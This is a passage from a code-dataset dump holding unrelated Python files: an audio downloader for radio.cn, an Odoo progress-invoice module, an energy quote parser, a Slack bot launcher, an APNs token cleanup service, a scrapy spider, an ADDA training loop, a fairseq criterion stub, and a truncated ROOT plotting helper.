ThreadPoolExecutor\nfrom pydub import AudioSegment\n\n\ndef get_url():\n \"\"\"\n 获取每集的标题和对应的url\n :return:\n \"\"\"\n item = dict()\n url = '''http://pacc.radio.cn/sharenew/ondemand?ondemandId=1382204&type=1&offset={}&limit=30'''\n offset = 1\n while offset < 18:\n datas = requests.get(url.format(offset), headers={'User-Agent': UserAgent(verify_ssl=False).random}, verify=False).json()\n contents = datas['progarms']\n for content in contents:\n name = content['name']\n down_url = content['streamsm4a']\n print(name, down_url)\n item[name] = down_url\n offset += 1\n time.sleep(random.uniform(1, 1.5))\n return item\n\n\ndef down(url, name):\n \"\"\"\n 下载音频\n :param url: 音频url\n :param name: 音频名称\n :return:\n \"\"\"\n try:\n print(f'{name}开始保存!')\n path = os.path.join(file_path, f'{name}.m4a')\n name = re.sub(r'[\\\\/:?*\"<>\\n]', '', name)\n datas = requests.get(url, headers={'User-Agent': UserAgent(verify_ssl=False).random}, verify=False).content\n with open(path, 'wb') as f:\n f.write(datas)\n print(f'{name}下载成功!')\n except Exception as e:\n print(f'{name}保存失败!')\n\n\ndef process(file):\n \"\"\"\n 截取音频,从第15秒开始到除最后2分钟之间的音频\n :param file: 音频名称\n :return:\n \"\"\"\n print(f'正在处理{file}')\n # 截取名称,1.mp3-->1\n save_name = os.path.splitext(file)[0]\n # 加载文件\n song = AudioSegment.from_file(os.path.join(file_path, file), format='m4a')\n # 截取音频,最后8秒分贝降低\n without = song[15*1000:-120*1000].fade_out(8000)\n # 保存mp3\n without.export(os.path.join(save_path, f'{save_name}.mp3'), format='mp3')\n print(f'{file}处理完成!保存为{save_name}.mp3')\n\n\nif __name__ == '__main__':\n file_path = r'****'\n res = get_url()\n # 下载音频\n pool = ThreadPoolExecutor(3)\n for do_name, do_url in res.items():\n pool.submit(down, do_url, do_name)\n\n pool.shutdown(wait=True)\n # 处理音频\n pool_process = ThreadPoolExecutor(5)\n # path = r'E:\\Study\\项目\\008面试\\斗罗大陆'\n save_path = r'****'\n all_files = os.listdir(file_path)\n for in_file in all_files:\n pool_process.submit(process, in_file)\n\n 
pool_process.shutdown(wait=True)\n","sub_path":"云听斗罗大陆音频下载/yunting.py","file_name":"yunting.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"223144952","text":"# coding: utf-8\nimport TemplateListRenderMixin\nfrom base import BaseExtWindow\n\nclass PrintTemplateListMixin(object):\n u\"\"\"\n Миксин для наделения окна\n волшебной способностью генерировать кнопки\n для печатных форм.\n \"\"\"\n def __init__(self):\n assert isinstance(self, BaseExtWindow)\n self.PRINT_PARAMS = []\n assert isinstance(self, TemplateListRenderMixin)\n self.templates_list.append('PrintTemplateListMixin.js')\n\n def add_print_button(self, pack_shortname, grid=None, addmenu=None):\n u\"\"\"\n Создает кнопку для печатной формы.\n addmenu - указывает на создание меню(в любом случае, даже если в\n фикстурах будет всего один отчет)\n \"\"\"\n if grid is None:\n grid = getattr(self, 'grid', None)\n if not grid: # мы сделали все, что могли\n raise AttributeError('Error! Grid must be defined, not None!')\n\n handler = u\"\"\"\n function() {\n printDocument('%(url)s', '%(report_id)s', '%(pack_shortname)s', %(multiselect)s, '%(grid_id)s', %(not_need_selection)s)\n }\"\"\"\n self.print_element = get_report_laucher(\n pack_shortname, handler, ROUTER_SHORTNAME, grid.client_id, addmenu)\n grid.print_element = self.print_element\n if isinstance(grid, ExtMultiGroupinGrid):\n grid._top_bar.items.append(self.print_element)\n else:\n grid.top_bar.items.append(self.print_element)\n\n def add_print_params(self, fields):\n u\"\"\"\n Регистрируем поля,\n из которых будем брать значения\n при отправке запроса на печать.\n \"\"\"\n for fld in fields:\n self.PRINT_PARAMS.append(fld.client_id)","sub_path":"m3-blank/src/m3_blank/demo/PrintTemplateListMixin.py","file_name":"PrintTemplateListMixin.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"33796802","text":"from datetime import datetime\n\nfrom tablib import formats\n\nfrom brokerage.model import MatrixQuote\nfrom brokerage.quote_parser import QuoteParser, SpreadsheetReader, \\\n SimpleCellDateGetter\nfrom util.dateutils import date_to_datetime\nfrom util.monthmath import Month\nfrom util.units import unit_registry\n\n\nclass SparkMatrixParser(QuoteParser):\n NAME = 'spark'\n reader = SpreadsheetReader(formats.xlsx)\n\n HEADER_ROW = 7\n RCA_COLS = ['A', 'B', 'C', 'E']\n START_COL = 'F'\n VOLUME_RANGE_COL = 'H'\n PRICE_COLS = reader.column_range('I', 'M')\n\n EXPECTED_SHEET_TITLES = [ 'LED Matrix' ]\n SHEET = 'LED Matrix'\n\n EXPECTED_CELLS = [\n (SHEET, 2, 'A', 'Effective Date'),\n (SHEET, HEADER_ROW, 'A', 'STATE'),\n (SHEET, HEADER_ROW, 'B', 'UTILITY'),\n (SHEET, HEADER_ROW, 'C', 'LOAD ZONE'),\n (SHEET, HEADER_ROW, 'E', 'PROFILES'),\n (SHEET, HEADER_ROW, START_COL, 'START DATE'),\n (SHEET, HEADER_ROW, VOLUME_RANGE_COL, 'ANNUAL USAGE.*'),\n ]\n\n date_getter = SimpleCellDateGetter(SHEET, 3, 'A', None)\n\n ROUNDING_DIGITS = 4\n\n def _extract_quotes(self):\n for row in xrange(self.HEADER_ROW + 1,\n self.reader.get_height(self.SHEET) + 1):\n rate_class_alias = '-'.join(self.reader.get(\n self.SHEET, row, col, basestring) for col in self.RCA_COLS)\n start_from = self.reader.get(\n self.SHEET, row, self.START_COL, datetime)\n start_until = date_to_datetime((Month(start_from) + 1).first)\n\n min_vol, limit_vol = self._extract_volume_range(\n self.SHEET, row, self.VOLUME_RANGE_COL,\n 
'(?P<low>[\\d,]+) to (?P<high>[\\d,]+)', fudge_low=True,\n expected_unit=unit_registry.kWh)\n\n for col in self.PRICE_COLS:\n term = self.reader.get_matches(\n self.SHEET, self.HEADER_ROW, col, '(\\d+) MTHS', int)\n price = self.reader.get(self.SHEET, row, col, float)\n yield MatrixQuote(start_from=start_from,\n start_until=start_until, term_months=term,\n valid_from=self._valid_from, valid_until=self._valid_until,\n min_volume=min_vol, limit_volume=limit_vol,\n rate_class_alias=rate_class_alias, price=price,\n service_type='electric', file_reference='%s %s,%s,%s' % (\n self.file_name, self.SHEET, row, col))\n","sub_path":"brokerage/quote_parsers/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"291675807","text":"import logging\n\nfrom . import bot\nfrom .config import config\nfrom . import channel\n\n\ndef main(config_overrides=[], quiet=False):\n for override in config_overrides:\n key, value = override\n section, key = key.rsplit('.', 1)\n config[section][key] = value\n\n handlers = []\n if not quiet:\n handlers.append(logging.StreamHandler())\n handlers.append(logging.FileHandler(config.logging['file']))\n\n logging.basicConfig(\n level=config.logging['level'].upper(),\n format=config.logging['format'],\n datefmt=config.logging['date_format'],\n handlers=handlers)\n\n logging.getLogger('schedule').setLevel(logging.WARN)\n\n # Initialize channel filter\n channel_config = config['channels']\n \"\"\":type : dict\"\"\"\n channels = channel_config.get(channel_config['type'], '').replace('#', '').split(',')\n channel_filter = channel.Filter(channel_config['type'], channels, channel_config['direct_messages'])\n\n logging.info('Starting slake bot')\n try:\n bot.start(config.slack['token'], channel_filter)\n except ConnectionError:\n logging.critical("Failed to connect to Slack. 
Make sure you're connected to the Internet and have specified the correct Slack API key in \"\n \"your configuration.\")\n return False\n except KeyboardInterrupt:\n return True\n except:\n logging.exception('An error occurred while starting slake')\n return False\n","sub_path":"slake/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"80112889","text":"import logging\nimport sys\nimport time\nfrom logging.config import fileConfig\nfrom configparser import ConfigParser\n\nfrom apnsclient import *\n\nimport psycopg2\nimport psycopg2.extras\nimport OpenSSL\nOpenSSL.SSL.SSLv3_METHOD = OpenSSL.SSL.TLSv1_METHOD\n\n\ndef get_last_update_of_token(token):\n cur.execute(\"SELECT create_time FROM device.device_pushbinding WHERE client_id = %s\", (token, ))\n result = cur.fetchone()\n if result:\n return result['create_time']\n else:\n return None\n\ndef remove_token(token):\n cur.execute(\"DELETE FROM device.device_pushbinding WHERE client_id = %s\", (token, ))\n\n\n\nif __name__ == \"__main__\":\n fileConfig('config.ini')\n logger = logging.getLogger()\n logger.debug(\"启动IOS feedback服务\")\n\n logger.debug(\"加载配置\")\n config = ConfigParser()\n config.read('config.ini')\n\n use_sandbox = config.getboolean(\"general\", \"use_sandbox\")\n\n\n\n\n conn = psycopg2.connect(database=config.get(\"db\", \"dbname\"),\n user=config.get(\"db\", \"username\"),\n password=config.get(\"db\", \"password\"),\n port=config.getint(\"db\", 'port'),\n host=config.get(\"db\", \"host\"))\n conn.autocommit = True\n\n cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n while True:\n try:\n logger.debug(\"开始连接feedback\")\n # feedback needs no persistent connections.\n session = Session()\n\n con = session.new_connection(\"feedback_sandbox\" if use_sandbox else \"feedback_production\",\n cert_file=\"certs/ck_dev.pem\" if use_sandbox else \"certs/ck_pro.pem\",\n passphrase=config.get(\"general\", \"passphrase\"))\n\n srv = APNs(con)\n\n # on any IO failure after successfull connection this generator\n # will simply stop iterating. 
you will pick the rest of the tokens\n # during next feedback session.\n logger.info(\"遍历feedback返回token列表\")\n for token, when in srv.feedback():\n token = token.decode()\n logger.info(\"处理Token: %s\", token)\n # every time a devices sends you a token, you should store\n # {token: given_token, last_update: datetime.datetime.now()}\n last_update = get_last_update_of_token(token)\n\n if last_update is not None and last_update < when:\n logger.info(\"Token: %s已经失效,从数据库中移除, 上次更新时间: %s, 发生错误时间: %s\", token, last_update, when)\n # the token wasn't updated after the failure has\n # been reported, so the token is invalid and you should\n # stop sending messages to it.\n # device_push_binding\n remove_token(token)\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n logger.error(\"处理 %s 异常,内容:%s, 行数: %d\", exc_type.__name__, exc_value, exc_tb.tb_lineno)\n finally:\n time.sleep(60)\n\n cur.close()\n conn.close()\n","sub_path":"ios_feedback.py","file_name":"ios_feedback.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"140696485","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nfrom scrapy_project.items import ScrapyProjectItem\nimport os\n\n\nclass MaoyanSpider(scrapy.Spider):\n name = 'maoyan'\n allowed_domains = ['maoyan.com']\n start_urls = ['https://maoyan.com/films?showType=3&offset=0']\n \n \n\n def start_request(self):\n # self.movie_num = self.settings.get('MOVIE_NUM')\n # print(self.movie_num)\n # page_num = (self.movie_num - 1)//30\n # for i in range(page_num + 1):\n # url = f'https://maoyan.com/films?showType=3&offset={i * 30}'\n # yield scrapy.Request(url=url, meta={'currentpage': i}, callback=self.parse)\n #问题:下面读取meta不对\n url = 'https://maoyan.com/films?showType=3&offset=0'\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=False)\n \n \n # 解析函数\n def parse(self, response):\n # print('测试数据:' + str(response.meta))\n # current_page = response.meta['currentpage']\n # self.movie_num = self.settings.get('MOVIE_NUM')\n # current_page_num = self.movie_num - current_page * 30\n selector_info = Selector(response=response)\n item = ScrapyProjectItem()\n for i, tags in enumerate(selector_info.xpath('//div[@class=\"movie-hover-info\"]')):\n if i >= 10: #读取10个电影,本想用current_page_num但有问题还未解决\n break\n for tag in tags.xpath('./div'):\n movie_name = tag.xpath('./@title').extract_first()\n print(movie_name)\n div_text = tag.xpath('./text()').extract()\n span_text = tag.xpath('./span/text()').extract_first()\n if span_text == '类型:':\n movie_type = div_text[1].strip()\n print(movie_type)\n if span_text == '上映时间:':\n movie_time = div_text[1].strip()\n print(movie_time)\n item['movie_name'] = movie_name\n item['movie_type'] = movie_type\n item['movie_time'] = movie_time\n yield item\n","sub_path":"week01/scrapy_project/scrapy_project/spiders/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"204335983","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = '{Jimmy Yeh}'\n__email__ = '{marrch30@gmail.com}'\n\"\"\"\n\nfrom dann_module.addamodel import ADDA \nfrom dann_module.datafunc import make_dataloaders\nfrom tqdm import tqdm\nimport torch\nimport os\n\nfrom math import sqrt\n\ntorch.manual_seed(7)\ntorch.cuda.manual_seed_all(100)\ntorch.backends.cudnn.deterministic = True \n\nclass Trainer():\n def __init__(self, 
args):\n self.model = ADDA()\n self.optimizer = torch.optim.Adam(\n list(self.model.encoder.parameters()) \\\n + list(self.model.classifier.parameters()),\n )\n self.ten_optimizer = torch.optim.Adam(self.model.tencoder.parameters())\n self.tel_optimizer = torch.optim.Adam(self.model.teller.parameters())\n \n self.criterion = torch.nn.CrossEntropyLoss()\n\n dataloaders = make_dataloaders(args.source, args.target, args.batch_size)\n self.sourceloader, self.targetloader, self.testtargetloader = dataloaders\n\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model.to(self.device)\n self.criterion.to(self.device)\n self.args = args\n self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s_%s.pth'%(args.source[:1], args.target[:1]))\n self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s_%s.pth'%(args.source[:1], args.target[:1]))\n self.dstep = 1\n self.tstep = 1\n\n def train(self):\n print('%s --> %s'%(self.args.source, self.args.target))\n best_acc = 0\n for i in range(1):\n self.train_one_epoch(i)\n for i in range(1):\n self.adjust_one_epoch(i)\n\n acc, loss = self.test()\n print(acc)\n\n\n # bbar = tqdm(range(self.args.epochs), ncols=100)\n # for epoch in bbar:\n # train_acc, train_loss = self.train_one_epoch(epoch)\n # dom_acc, dom_loss, tar_acc, tar_loss = self.adjust_one_epoch(epoch)\n # acc, test_loss = self.test()\n\n # self.model.save(self.modelpath)\n # if acc > best_acc:\n # best_acc = acc\n # torch.save(self.model.state_dict(), self.bestpath)\n # bbar.set_postfix(ac=acc, bacc=best_acc, dac=dom_acc, tar=tar_acc, tracc=train_acc)\n\n def train_one_epoch(self, epoch):\n self.model.train()\n pbar = tqdm(self.sourceloader, ncols=100, desc='tr'+str(epoch))\n \n for img, label in pbar:\n img, label = img.to(self.device), label.to(self.device)\n self.optimizer.zero_grad()\n output = self.model(img)\n loss = self.criterion(output, label)\n\n loss.backward()\n self.optimizer.step()\n acc = output.argmax(1).eq(label).sum()*100//len(label)\n pbar.set_postfix(loss=loss.item(), acc=acc.item())\n\n self.model.copy_target()\n return acc.item(), loss.item()\n\n def adjustpq(self, dom_acc, tar_acc):\n self.dstep = sqrt((1-dom_acc)*5) + 1\n if tar_acc > 0.8:\n self.tstep -= 0.1\n self.tstep = max(1, self.tstep)\n if tar_acc > 0.9:\n self.tstep -= 0.1\n self.tstep = max(1, self.tstep)\n\n if tar_acc < 0.5:\n self.tstep += 0.1\n else:\n self.tstep = min(3, self.tstep)\n if tar_acc < 0.4:\n self.tstep += 0.1\n else:\n self.tstep = min(3, self.tstep)\n if tar_acc < 0.3:\n self.tstep += 0.2\n else:\n self.tstep = min(4, self.tstep)\n if tar_acc < 0.2:\n self.tstep += 0.3\n else:\n self.tstep = min(6, self.tstep)\n if tar_acc < 0.1:\n self.tstep += 0.4\n else:\n self.tstep = min(8, self.tstep)\n if tar_acc < 0.05:\n self.tstep += 0.5\n else:\n self.tstep = min(11, self.tstep)\n\n def adjust_one_epoch(self, epoch):\n self.model.train()\n num_iteration = min(len(self.sourceloader), len(self.targetloader))\n pbar = tqdm(range(num_iteration), ncols=100, desc='adj'+str(epoch))\n\n for i in pbar:\n for __ in range(int(self.dstep)):\n timg, __ = next(iter(self.targetloader))\n simg, __ = next(iter(self.sourceloader))\n timg, simg = timg.to(self.device), simg.to(self.device)\n batch_size = len(timg)\n\n # train teller\n self.tel_optimizer.zero_grad()\n source_dom = self.model(simg, mode='domains')\n target_dom = self.model(timg, mode='domain')\n \n domain_label = torch.ones(batch_size).long().to(self.device)\n src_dom_loss = self.criterion(source_dom, domain_label)\n src_acc = 
source_dom.argmax(1).eq(domain_label).float().mean().item()\n\n domain_label = torch.zeros(batch_size).long().to(self.device)\n tar_dom_loss = self.criterion(target_dom, domain_label)\n tar_acc = target_dom.argmax(1).eq(domain_label).float().mean().item()\n\n dom_loss = (src_dom_loss + tar_dom_loss)/2\n\n dom_loss.backward()\n self.tel_optimizer.step()\n\n dom_acc = (src_acc + tar_acc)/2\n\n\n ## train tencoder\n for __ in range(int(self.tstep)):\n self.ten_optimizer.zero_grad()\n self.tel_optimizer.zero_grad()\n\n dom_output = self.model(timg, mode='domain')\n domain_label = torch.ones(batch_size).long().to(self.device)\n\n tar_loss = self.criterion(dom_output, domain_label)\n tar_loss.backward()\n tar_acc = dom_output.argmax(1).eq(domain_label).float().mean().item()\n self.ten_optimizer.step()\n\n # self.adjustpq(dom_acc, tar_acc)\n pbar.set_postfix(dom_acc=dom_acc, tar_acc=tar_acc, dstep=self.dstep, tstep=self.tstep)\n\n\n return dom_acc, dom_loss.item(), tar_acc, tar_loss.item()\n\n def test(self):\n self.model.eval()\n loss = 0 \n acc = 0\n length = 0\n pbar = tqdm(self.testtargetloader, ncols=100, desc='test')\n for images, labels in pbar:\n images, labels = images.to(self.device), labels.to(self.device)\n output = self.model(images, mode='target')\n loss += self.criterion(output, labels).item()\n\n pred = output.argmax(1)\n acc += pred.eq(labels).sum().item()\n length += len(labels)\n\n loss /= length\n acc /= length\n return acc, loss\n\n\n\n","sub_path":"src/00template/module/gbin/addaxxtrainer.py","file_name":"addaxxtrainer.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"156314633","text":"# Copyright (c) 2019-present, Zhiqiang Wang.\n\nfrom fairseq.criterions import FairseqCriterion, register_criterion\n\n\n@register_criterion('fasterrcnn_loss')\nclass FasterRCNNLoss(FairseqCriterion):\n\n def __init__(self, args, task):\n super(FairseqCriterion, self).__init__()\n self.args = args\n\n def forward(self, model, sample, reduction='mean'):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n\n def compute_loss(self):\n pass\n\n @staticmethod\n def aggregate_logging_outputs(logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n assert len(logging_outputs) == 1\n log = logging_outputs[0]\n loss = log.get('loss', 0)\n ntokens = log.get('ntokens', 0)\n batch_sizes = log.get('nsentences', 0)\n sample_size = log.get('sample_size', 0)\n agg_output = {\n 'loss': loss,\n 'ntokens': ntokens,\n 'nsentences': batch_sizes,\n 'sample_size': sample_size,\n }\n return agg_output\n","sub_path":"sightseq/criterions/fasterrcnn_loss.py","file_name":"fasterrcnn_loss.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"527432976","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, Warning\nfrom odoo.tools import email_re, email_split, email_escape_char, float_is_zero, float_compare, \\\n pycompat, date_utils\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n @api.model\n def _default_journal(self):\n journal_type = self._context.get('journal_type', False)\n 
progress_invoice = self._context.get('default_progress_invoice', False)\n company_id = self._context.get('company_id', self.env.user.company_id.id)\n\n if journal_type and journal_type == 'purchase' and progress_invoice:\n return self.env['account.journal'].search(\n [('type', '=', 'purchase'), ('progress_invoice', '=', True), ('company_id', '=', company_id)],\n limit=1)\n else:\n return super(AccountInvoice, self)._default_journal()\n\n # @api.one\n # @api.depends('partner_id', 'subcontract_requisition_id')\n # def _compute_former_invoice(self):\n # domain = [('partner_id', '=', self.partner_id.id), ('progress_invoice', '=', True), ('state', 'not in', ['draft', 'cancel'])]\n # if self.subcontract_requisition_id:\n # domain.append(('subcontract_requisition_id', '=', self.subcontract_requisition_id.id))\n # self.former_invoice_id = self.search(domain, limit=1, order=\"id desc\")\n\n @api.one\n @api.depends('partner_id')\n def _compute_balance(self):\n moawlyen_account_code = 21004\n domain = [('code', '=', moawlyen_account_code),\n ('internal_type', 'in', ['receivable', 'payable'])]\n account_ids = self.env['account.account'].search(domain)\n domain = [('analytic_account_id', '=', self.account_analytic_id.id),\n ('partner_id', '=', self.partner_id.id),\n ('company_id', '=', self.company_id.id)]\n move_line_ids = self.env['account.move.line'].search(domain).filtered(\n lambda r: r.account_id.id in account_ids.ids)\n self.partner_balance = sum(move_line_ids.mapped('debit')) - sum(move_line_ids.mapped('credit'))\n\n @api.one\n # @api.depends('partner_balance', 'amount_total')\n def _compute_est_balance(self):\n self.est_balance = (self.partner_balance or 0.0) - self.amount_total\n\n # state = fields.Selection(selection_add=[('waiting_inv_approval', 'Waiting Approval'), ('inv_approved', 'Approved')])\n state = fields.Selection([\n ('draft','Draft'),\n ('waiting_inv_approval', 'Waiting Approval'),\n ('inv_approved', 'Approved'),\n ('open', 'Open'),\n ('in_payment', 'In Payment'),\n ('paid', 'Paid'),\n ('cancel', 'Cancelled'),\n ], string='Status', index=True, readonly=True, default='draft',\n track_visibility='onchange', copy=False,\n help=\" * The 'Draft' status is used when a user is encoding a new and unconfirmed Invoice.\\n\"\n \" * The 'Open' status is used when user creates invoice, an invoice number is generated. It stays in the open status till the user pays the invoice.\\n\"\n \" * The 'In Payment' status is used when payments have been registered for the entirety of the invoice in a journal configured to post entries at bank reconciliation only, and some of them haven't been reconciled with a bank statement line yet.\\n\"\n \" * The 'Paid' status is set automatically when the invoice is paid. 
Its related journal entries may or may not be reconciled.\\n\"\n \" * The 'Cancelled' status is used when user cancel invoice.\")\n account_analytic_id = fields.Many2one('account.analytic.account', string='Project')\n progress_type = fields.Selection([('ongoing', 'Ongoing'), ('final', 'Final'), ('opening', 'Opening')],\n string='Progress Type')\n date_from = fields.Date('Date From')\n date_to = fields.Date('Date To')\n partner_account = fields.Many2one(related=\"partner_id.property_account_payable_id\")\n payment_ref = fields.Char('Payment Reference')\n partner_balance = fields.Monetary(string='Partner Balance', compute=_compute_balance)\n former_invoice_id = fields.Many2one('account.invoice', string='Former Invoice')\n # former_invoice_id = fields.Many2one('account.invoice', string='Former Invoice', compute=_compute_former_invoice, store=True)\n progress_invoice = fields.Boolean('Progress Invoice')\n journal_id = fields.Many2one('account.journal', string='Journal',\n required=True, readonly=True, states={'draft': [('readonly', False)]},\n default=_default_journal,\n domain=\"[('type', 'in', {'out_invoice': ['sale'], 'out_refund': ['sale'], 'in_refund': ['purchase'], 'in_invoice': ['purchase']}.get(type, [])), ('company_id', '=', company_id)]\")\n sequence_number_next = fields.Char(string='Next Number', compute=\"_get_sequence_number_next\", inverse=\"_set_sequence_next\", readonly=True, store=True)\n number = fields.Char('Number')\n number2 = fields.Char('Number')\n est_balance = fields.Monetary(string='Estimated Balance', compute=_compute_est_balance)\n\n def send_inv_approval(self):\n self.state = \"waiting_inv_approval\"\n\n def confirm_inv_approval(self):\n if self.user_has_groups('progress_invoice.group_manage_inv_approval'):\n self.state = \"inv_approved\"\n else:\n raise Warning(\"You don't have permission to approve. 
please enable from User Settings\")\n\n @api.multi\n def action_invoice_open(self):\n res = super(AccountInvoice, self).action_invoice_open()\n\n for inv in self:\n if inv.subcontract_requisition_id and inv.progress_invoice:\n for line in inv.invoice_line_ids:\n requisition_line_ids = inv.subcontract_requisition_id.line_ids.filtered(lambda r: r.product_id == line.product_id and r.sequence == line.sequence )\n requisition_line_ids._compute_ordered_qty()\n requisition_line_ids._compute_ordered_price()\n for scr_line in requisition_line_ids:\n if scr_line.product_qty < scr_line.qty_invoiced:\n raise Warning(_(\"You can't exceed the Contract quantity, please contact your administrator.\"))\n if (scr_line.product_qty * scr_line.price_unit) < scr_line.price_invoiced:\n raise Warning(_(\"You can't exceed the Contract amount, please contact your administrator\"))\n return res\n\n @api.onchange('partner_id', 'subcontract_requisition_id')\n def _onchange_subcontract_requisition_id(self):\n former_invoice_id = False\n domain = [('progress_invoice', '=', True), ('state', 'not in', ['draft', 'cancel'])]\n if self.partner_id:\n domain.append(('partner_id', '=', self.partner_id.id))\n if self.subcontract_requisition_id:\n domain.append(('subcontract_requisition_id', '=', self.subcontract_requisition_id.id))\n if self.partner_id or self.subcontract_requisition_id:\n former_invoice_id = self.search(domain, limit=1, order=\"id desc\")\n return {\n 'value': {'former_invoice_id': former_invoice_id},\n 'domain': {'former_invoice_id': [('subcontract_requisition_id', '=', self.subcontract_requisition_id and self.subcontract_requisition_id.id)]},\n }\n\n @api.multi\n def xmlrpc_onchange_invoice_line_ids(self):\n self._onchange_invoice_line_ids()\n return True\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n @api.one\n @api.depends('invoice_id.former_invoice_id')\n def _get_previous_qty(self):\n if self.invoice_id.former_invoice_id:\n lines = self.invoice_id.former_invoice_id.invoice_line_ids.filtered(lambda r: r.product_id.id == self.product_id.id and r.line_sequence == self.line_sequence and r.price_unit == self.price_unit)\n self.prev_qty = sum(lines.mapped('total_qty'))\n else: # if not self.invoice_id.former_invoice_id:\n\n contract_ids = self.env['subcontract.requisition'].search([('id', '=', self.invoice_id.subcontract_requisition_id.id)])\n for rec in self:\n for contract in contract_ids.line_ids:\n if rec.product_id.id == contract.product_id.id and rec.line_sequence==contract.sequence:\n rec.prev_qty = contract.previ_qty#rec.invoice_id.subcontract_requisition_id.previ_qty\n\n @api.multi\n def xmlrpc_compute_total_qty(self):\n self._get_total_qty()\n return True\n\n @api.one\n @api.depends('prev_qty', 'quantity')\n def _get_total_qty(self):\n self.total_qty = self.quantity + self.prev_qty\n\n @api.one\n @api.depends('invoice_id.former_invoice_id')\n def _get_previous_amount(self):\n if self.invoice_id.former_invoice_id:\n lines = self.invoice_id.former_invoice_id.invoice_line_ids.filtered(lambda r: r.product_id.id == self.product_id.id and r.line_sequence == self.line_sequence and r.price_unit == self.price_unit)\n self.prev_amount = sum(lines.mapped('total_amount'))\n else: # if self.invoice_id.former_invoice_id == False:\n\n contract_ids = self.env['subcontract.requisition'].search(\n [('id', '=', self.invoice_id.subcontract_requisition_id.id)])\n for rec in self:\n for contract in contract_ids.line_ids:\n if rec.product_id.id == contract.product_id.id and 
rec.line_sequence==contract.sequence:\n rec.prev_amount = contract.previ_amount\n # self.prev_amount = self.invoice_id.subcontract_requisition_id.prev_amount\n\n\n\n @api.one\n @api.depends('price_unit', 'total_qty', 'percentage')\n def _get_total_amount(self):\n percentage = (self.percentage / 100) if self.percentage else 1\n self.total_amount = self.price_unit * self.total_qty * percentage\n\n @api.one\n @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity', 'product_id', 'invoice_id.partner_id',\n 'invoice_id.currency_id', 'invoice_id.company_id', 'invoice_id.date_invoice', 'invoice_id.date',\n 'prev_amount', 'total_amount')\n def _compute_price(self):\n super(AccountInvoiceLine, self)._compute_price()\n if self.invoice_id.progress_invoice:\n self.price_subtotal = self.total_amount - self.prev_amount\n\n cost_code = fields.Many2one('subcontract.code', string=\"Cost Code\")\n prev_qty = fields.Float('Previous Quantity', compute='_get_previous_qty')\n percentage = fields.Float('Percentage')\n total_qty = fields.Float('Total Quantity', store=True, compute='_get_total_qty')\n prev_amount = fields.Monetary(string='Previous Amount', compute='_get_previous_amount')\n total_amount = fields.Monetary(string='Total Amount', store=True, compute='_get_total_amount')\n\nclass AccountJournal(models.Model):\n _inherit = 'account.journal'\n\n progress_invoice = fields.Boolean('Is Progress Invoice?')\n","sub_path":"addons/progress_invoice/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"432938747","text":"from ROOT import TCanvas, TPad, TFormula, TF1, TPaveLabel, TH1F, TH2F, TFile, TColor\nfrom ROOT import gROOT, gBenchmark, gStyle, gRandom, gPad\nimport numpy as np\nfrom array import array \nmA_ticks = [100, 200, 300, 350, 500, 650, 800, 1000, 1500, 2000, 2500, 3000, 3500]\nma_ticks = [1, 50, 100, 150, 200, 400, 600, 800]\ndef set_palette(name=\"\", ncontours=999):\n \"\"\"Set a color palette from a given RGB list\n stops, red, green and blue should all be lists of the same length\n see set_decent_colors for an example\"\"\"\n\n if name == \"gray\" or name == \"grayscale\":\n stops = [0.00, 0.34, 0.61, 0.84, 1.00]\n red = [1.00, 0.84, 0.61, 0.34, 0.00]\n green = [1.00, 0.84, 0.61, 0.34, 0.00]\n blue = [1.00, 0.84, 0.61, 0.34, 0.00]\n # elif name == \"whatever\":\n # (define more palettes)\n else:\n # default palette, looks cool\n stops = [0.00, 0.34, 0.61, 0.84, 1.00]\n #red = [0.00, 0.00, 0.87, 1.00, 0.51]\n red = [0.00, 0.00, 0.0, 0.00, 0.0]\n green = [0.00, 0.81, 1.00, 0.20, 0.00]\n blue = [0.51, 1.00, 0.12, 0.00, 0.00]\n\n s = array('d', stops)\n r = array('d', red)\n g = array('d', green)\n b = array('d', blue)\n\n npoints = len(s)\n TColor.CreateGradientColorTable(npoints, s, r, g, b, ncontours)\n gStyle.SetNumberContours(ncontours)\n\ndef make_plot(channel = '', year='2017', data_obs=[], data_exp=[], data_exp_p1=[], 